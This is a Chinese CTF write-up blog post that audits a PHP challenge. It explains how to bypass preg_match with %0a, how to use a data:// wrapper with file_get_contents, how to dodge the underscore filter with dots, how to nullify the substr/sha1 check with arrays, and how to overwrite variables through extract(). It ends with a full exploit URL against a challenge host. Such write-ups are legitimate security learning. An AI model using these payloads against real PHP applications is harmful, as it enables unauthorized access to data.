简单的套娃

最新推荐文章于 2024-07-27 22:51:17 发布
最新推荐文章于 2024-07-27 22:51:17 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: php代码审计 文章标签: web php 正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46230316/article/details/105912930
版权

套娃

最简单的那种套娃

<?php 
include 'flag.php';
highlight_file(__FILE__); 
error_reporting(0); 

$ia = "index.php"; 
$query = $_SERVER['QUERY_STRING'];
//var_dump($_GET);
if (preg_match('/^xxxxisfun$/', $_GET['xxxx']) && $_GET['xxxx'] !== 'xxxxisfun') {
  $ia = $_GET["id"];
}


if(file_get_contents($ia)!=='xxxxisfun') { 
  die('go away'); 
} 

if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
  die('no!');
}
if($_GET['x_x_x_x'] !== '666' && preg_match('/^666$/', $_GET['x_x_x_x'])){
  echo "let's go";

if($_GET)
$tql = $_GET['tql']; 
$action=''; 
if(substr($_GET['tql'], 32) === sha1($_GET['tql'])) { 
  extract($_GET["flag"]); 
} 

if($action === 'givemeflag'){
  echo $flag;
}
}
else
{
  echo 'nonono';
}

?>

preg_match 执行匹配正则表达式

file_get_contents() 函数把整个文件读入一个字符串中

if (preg_match('/^xxxxisfun$/', $_GET['xxxx']) && $_GET['xxxx'] !== 'xxxxisfun') {
  $ia = $_GET["id"];
}


if(file_get_contents($ia)!=='xxxxisfun') { 
  die('go away'); 
}

进行审计,这里有两个条件

  • 第一个就是xxxx===xxxxisfun,很简单,这里的正则表达式检查第一个和最后一个字符,可以用/的URL编码%0a绕过

  • 第二个是通过file_get_content函数将整个数据读入一个字符串中,但是后面的值使用的单引号,并且中间使用===来判断全等,通过查找这里可以使用data:// 来进行转换 格式为data://text/plain;base64,将xxxxisfun进行base64编码得到eHh4eGlzZnVu,所以需要通过get提交一个名为id的参数,值为data://text/plain;base64,eHh4eGlzZnVu
    xxxx=xxxxisfun%0a&id=data://text/plain;base64,eHh4eGlzZnVu


if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
  die('no!');
}
if($_GET['x_x_x_x'] !== '666' && preg_match('/^666$/', $_GET['x_x_x_x'])){
  echo "let's go";

这里的意思是x_x_x_x===666但是不能有_和他的URL编码

这里利用正则匹配绕过一下,‘.’匹配任意任意一个字符

在这里插入图片描述

构造x.x.x.x=666

if($_GET)
$tql = $_GET['tql']; 
$action=''; 
if(substr($_GET['tql'], 32) === sha1($_GET['tql'])) { 
  extract($_GET["flag"]); 
} 

if($action === 'givemeflag'){
  echo $flag;
}

这里是一个变量覆盖

  • tql[]是为了绕过substr函数的限制,subster不能处理数组,所以会把返回值为空,sha1函数也是,空===空,所以继续进行。
  • extract函数从数组中将变量导入当前页面,用get传入一个flag[action]=givemeflag,到extract里就是extract(flag[action]=givemeflag),这时flag就是个数组,生成了一个名为action,值为givemeflag的变量,将原来的$action=‘’给覆盖了

playload:tql[]=&flag[action]=givemeflag

总playload:

http://49.234.5.69:30001/?xxxx=xxxxisfun%0a&id=data://text/plain;base64,eHh4eGlzZnVu&x.x.x.x=666%0a&tql[]=&flag[action]=givemeflag
在这里插入图片描述

mon0dy
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
Scratch趣味小游戏源码合集儿童趣味编程源码参考Scratch游戏源码下载
09-16
Scratch趣味小游戏源码合集儿童趣味编程源码参考Scratch游戏源码下载,scratch小游戏合集,适合小朋友自学。新颖、有趣的游戏制作可以激发孩子的学习兴趣。家里有朋友的家长记得给小朋友下载学习哦,游戏的素材非常...
bugku-简单
kw741951的博客
03-26 167
所以想到文件分离,试着把第一个FF D8 FF的文件删掉,剩下的另存为一张图片。看到端倪,有两个jpg文件头FF D8 FF。打开图片,得到图片右上角有隐含的flag。首先查看一下属性,没有找到有用信息。试试用010editor打开。
ctf MISC 简单
god_001的博客
03-27 1126
题目给了一个图片 用010editor分析,发现两个 FF D8(JPG图像起始位置),复制第二段开始的数据另存为JPG图像 将得到的两个图象使用Stegsolve里的"Image Combiner"模式(图片拼接),在SUB(R,G,B)模式下得到flag 对于Stegsolve的使用: 其有 File Format、Data Extract、Steregram Solve、Frame Browser、Image Combiner五种功能 File Format文件格式功能下,可查看图片的
中国海洋大学新生赛
pwfortune的博客
05-18 803
使用 parse_str 函数解析查询字符串,将其转换为 PHP 变量。name=John&age=30,那么 parse_str 会创建两个变量 $name 和 $age,并分别赋值为 John 和 30。在php中 . 和空格 在传参时会被转化成下划线,正好前面把 . 和 _ 给过滤了 ,用空格替代。因为前面存在的parse_str() 函数,能够变量覆盖, 然后再进行MD5弱比较。可在eval()中多重转码混淆,依旧可以执行js代码,有返回值。还需要绕过preg_match(),而在非多行模式下,
Bugku:简单
qq_46230755的博客
02-28 2710
此题用于致敬永远的套神mumuzi。 套神博客:https://blog.csdn.net/qq_42880719 打开题目,是一个图片。 丢进010发现有两个jpg头 把第二个FFD8FFE0后面一起复制下来,另存为一个新的图片。 丢进StegSolve,发现别的图层存在flag。 flag{Mumuzi_the_God_of_Matryoshka} ...
bugku 简单
weixin_46578840的博客
06-26 418
下载打开,是一个图片,010打开,一看过去有两个FF D8,也就是两个jpg的头部,将下面另一个以下全部另存为新的jpg图片 Stegsolve打开 眼睛看废了才得到 flag{Mumuzi_the_God_of_Matryoshka}
BugkuCTF-MISC题简单
am_03的博客
09-04 871
打开题目,是一个图片。 丢进010发现有两个jpg头 把第二个FFD8FFE0后面一起复制下来,另存为一个新的图片。 丢进StegSolve,发现别的图层存在flag。 点击下方的左右箭头变换, 若flag实在看不清,两张图放进Stegsolve的Image Combiner通过SUB(RGB separate)模式看一下(相互变换两张图片打开顺序) ...
简单MISC-Bugku
Alasding的博客
09-15 584
简单MISC 题目分析答案 题目 一只美丽的水母 但是……美丽是它的,跟我又有什么关系呢,我只是个瞎子 罢了 分析 经过查看,图片格式没问题,不是压缩包,flag不在末尾,不是lsb隐写…… 010打开,分析: 发现存在两个jpg的格式头 FFD8FFE0 把第二个格式头以及之后的全部内容选中,重新保存一个图片 发现和原图一样…… 看了提示才知道,要用stegsolver打开图片,然后用image combiner将提取出的图片和原图叠加,左右点点看,发现在SUB有了新世界! 瞎眼吗…… 再大
bugku 简单详细步骤
qq_44740774的博客
05-30 1056
第一步 用010edit打开图片文件,输入文件头,发现有两个图层,将第二个图层从头到结尾全部复制粘贴到十六进制文件中去,最后保存为jpg格式就得到和原图差不多的图片# 第二步 用Stegsolve.jar中的Analyse中imge combiner功能打开图片就能得到flag 比较费眼! flag{Mumuzi_the_God_of_Matryoshka} ...
bugku:简单的套
qq_57061511的博客
06-14 1050
bugku:简单的套 下载得到一张图片,根据题目提示,猜测是图片里面套图片,使用binwalk打开发现,果然有两张图片,接下来我们要进行图片提取,将图片拖到010editor中,将第二个JPG文件头后面的复制下来另存,得到另一张图片,放到stegsolve中,点击SteregramSolve,左右偏移立体视图,直到发现flag出现。 知识点: 1.binwalk:binwalk是用于搜索给定二进制镜像文件以获取嵌入的文件和代码的工具。具体使用方法参考大神博客(转载):【binwalk使用整理_轩渊的博客.
MongoDB - 对pymongo的简单
MarkAdc的博客
02-18 904
java套_Java
weixin_39527292的博客
02-16 301
程序员讨厌写文档, 讨厌写注释, 而我还讨厌写日志, 输出一个 "Id=5, 姓名=王大锤, 性别=男, 生日=2020年1月1日" 总归会用到字符串的填充 var log = $"Id={person.Id}, 姓名={person.Name}, 性别={(person.Sex == SexTyp ...»zhouandke2021-02-06每天定时获取必应每日一图并保存做壁纸 ​ 必应每天会...
网赚APP的“俄罗斯套”游戏.docx
05-01
### 网赚APP的“俄罗斯套”游戏——揭秘其背后的运作机制 #### 一、网赚APP的兴起与目标群体 随着互联网技术的普及和发展,越来越多的网赚APP开始进入人们的视野,特别是对于中老年群体来说,这类APP似乎提供了...
leetcode信封-LeetCode-QA:LeetCode-QA
06-30
leetcode信封 LeetCode-QA ...用于记录上的解答 ...俄罗斯套信封问题 困难 503 下一个更大元素 II 中等 706 设计哈希映射 简单 1047 删除字符串中的所有相邻重复项 简单 1629 按键持续时间最长的键 简单 1779
Python-Python隐写工具用来在图像中隐藏图像或文本
08-10
至于压缩包中的文件“Matroschka-master”,这个名字可能是指一个开源项目或库,它与俄罗斯套(Matryoshka dolls)的层层嵌套概念相呼应,可能意味着该工具能够在图像中嵌套多层隐藏信息。在Python中,这样的实现...
PHP商城案例
王世凡的技术博客
07-26 306
http://www.e9933.com/
[Meachines] [Easy] Beep Elastix-CMS-LFI
最新发布
07-27 249
#Elastix-CMS-LFI
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 1071
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
ctfshow套shell
08-24
CTFSHOW套shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值